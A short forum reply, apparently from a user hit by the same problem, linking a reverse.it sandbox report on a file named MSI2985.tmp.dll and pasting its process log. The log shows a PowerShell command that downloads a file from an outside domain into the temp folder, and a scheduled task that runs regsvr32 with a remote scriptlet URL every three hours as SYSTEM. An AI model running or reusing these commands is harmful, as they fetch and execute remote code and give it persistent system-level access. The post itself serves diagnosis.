system
14
I have the same problem, and I just was just digging on the internet and found this:
https://www.reverse.it/sample/7d76d5b481208886acdb03894200d29014a84caa35cefc2e6f946eb609c33d47?environmentId=100
by the way, i don’t regularly use forums and don’t know the rules and how it works
but, going on…
on reverse.it they got this MSI2985.tmp.dll thing, that appears to call the powershell and make somes downloads
Analysed 16 processes in total (System Resource Monitor).
RunDLL “C:\MSI2985.tmp.dll” (PID: 2684)
rundll32.exe “C:\MSI2985.tmp.dll”,AdWork (PID: 3312)
powershell.exe $client = new-object System.Net.WebClient;$client.DownloadFile(‘http://point.suibianzaimai.com/nealcf?memca=zDlkPGZir3h4mXQyZXRpw2tuzaI8N2YyNdVaZS84MdNaE2JaZixhE3Rpr249meRaZi4x’,'%TEMP%\sD037.tmp’) (PID: 3204)
schtasks.exe schtasks /Create /SC HOURLY /MO 3 /ST 08:28:00 /TN “PowerWord-SCT-JT” /TR “regsvr32.exe /s /i:http://point.lotusiloveyou.com/?data=zDlkPGZir3h4mXQyZXRpw2tuzaI8N2YyNdVaZS84MdNaE2JaZq== scrobj.dll” /RU “SYSTEM” /F /RL HIGHEST (PID: 3264)